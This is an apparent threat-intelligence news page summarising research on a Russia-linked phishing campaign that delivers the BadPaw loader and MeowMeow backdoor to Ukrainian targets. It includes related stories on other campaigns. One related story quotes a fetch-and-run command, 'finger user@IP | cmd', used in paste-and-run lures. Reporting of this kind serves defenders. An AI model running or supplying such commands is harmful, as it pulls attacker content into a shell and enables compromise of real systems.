Russian Phishing Campaign Targets Ukraine With BadPaw Loader and MeowMeow Backdoor
A Russia-linked phishing campaign has targeted Ukrainian entities using emails that lure recipients into downloading a ZIP archive, leading to installation of two newly identified malware families: the BadPaw loader and the MeowMeow backdoor. Reporting based on ClearSky’s analysis describes messages sent from addresses hosted on Ukrainian service ukr[.]net, with a redirect to a ZIP containing a Ukraine-themed border checkpoint/permit lure; opening the archive triggers execution that downloads BadPaw, which then establishes C2 and deploys MeowMeow.
The malware chain is designed to complicate analysis and evade detection. ClearSky reported BadPaw as a .NET-based loader and noted use of the .NET Reactor packer/obfuscator, while MeowMeow provides backdoor functionality including file enumeration and data read/write/delete operations. Additional defensive measures include conditional execution (components remaining inert unless launched with specific parameters) and environment checks by MeowMeow to detect sandboxes or analysis tooling (e.g., Wireshark, ProcMon, Fiddler). Based on infrastructure and tradecraft indicators (including ukr[.]net-hosted sender addresses), researchers attributed the activity with low confidence to APT28 (aka Fancy Bear/Forest Blizzard/Blue Delta).
Timeline
Mar 5, 2026
ClearSky attributes Ukraine-targeting campaign to a Russia-linked espionage actor
ClearSky assessed with high confidence that the operation is linked to a Russian cyberespionage group, citing Ukrainian targeting, Russian-language code artifacts, and overlaps with prior Russian tradecraft. The researchers said attribution to APT28 was lower confidence, with one report describing it as low confidence and another as lower to moderate confidence.
Mar 5, 2026
Researchers disclose technical details of BadPaw and MeowMeow malware
Analysis revealed that the lure uses a disguised HTA file showing a Ukrainian-language border-crossing decoy while executing malicious stages, including sandbox-evasion checks, scheduled-task persistence, and steganographic extraction of a hidden payload from an image. Researchers said BadPaw acts as a .NET loader that establishes command-and-control and deploys MeowMeow, an advanced backdoor with anti-analysis checks and file access capabilities.
Mar 5, 2026
Russian phishing campaign targets Ukrainian organizations with new malware
Researchers reported a phishing campaign targeting Ukrainian entities using emails from ukr.net-hosted addresses and links to a ZIP archive disguised as a Ukrainian border checkpoint permit. The infection chain delivers the newly identified BadPaw loader, which then installs the MeowMeow backdoor.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Organizations
Affected Products
Sources
Related Stories
APT28-Linked Phishing Campaign Deploys BadPaw Loader and MeowMeow Backdoor Against Ukraine
ClearSky reported a suspected Russian espionage campaign targeting Ukrainian entities using phishing emails that deliver two previously undocumented malware families: the **BadPaw** loader and the **MeowMeow** backdoor. The infection chain begins with a lure email (sent from `ukr[.]net` to appear credible) containing a link that first loads an unusually small image functioning as a tracking pixel to confirm user interaction, then redirects victims to download a ZIP archive. When opened, the archive launches an HTA that displays a Ukrainian-language decoy document about border-crossing appeals while executing background stages that deploy the .NET-based BadPaw loader, which then retrieves and installs the MeowMeow backdoor from a remote server; the HTA also performs sandbox/analysis-evasion checks. The activity was attributed with **moderate confidence** to **APT28** based on targeting, geopolitical lures, and technique overlaps with prior Russian operations. Separate reporting also noted CERT-UA warnings about other phishing-driven malware activity against Ukrainian government institutions (including **SHADOWSNIFF**, **SALATSTEALER**, and a Go backdoor **DEAFTICKK** attributed to **UAC-0252**), but that campaign is distinct from the BadPaw/MeowMeow intrusion chain and should not be conflated with the APT28-linked activity.
1 months ago
Void Blizzard (Laundry Bear) Charity-Themed Lures Deliver PluggyApe Backdoor to Ukraine’s Defense Forces
Ukraine’s CERT (CERT-UA) reported a cyber-espionage campaign targeting representatives of **Ukraine’s Defense Forces** between October and December 2025, using social-engineering lures themed around charitable foundations. Victims were contacted via **Signal** and **WhatsApp** and directed to charity-impersonation websites or sent password-protected archives that purported to contain documents but instead delivered executable payloads (including `*.docx.pif`), sometimes sent directly through the messaging apps. The activity was attributed with **medium confidence** to the Russia-aligned threat actor **Void Blizzard** (also tracked as **Laundry Bear** and **UAC-0190**). The campaign deployed a previously undocumented backdoor dubbed **PluggyApe**, built as a Python executable packaged with **PyInstaller**, which profiles infected hosts, establishes persistence via **Windows Registry** modification, and enables remote command execution. CERT-UA noted an evolution in late 2025 from earlier loader naming patterns (e.g., `*.pdf.exe`) to **PIF-based delivery** and an updated **PluggyApe v2** featuring stronger obfuscation, **MQTT-based** command-and-control, and additional anti-analysis checks.
1 months ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago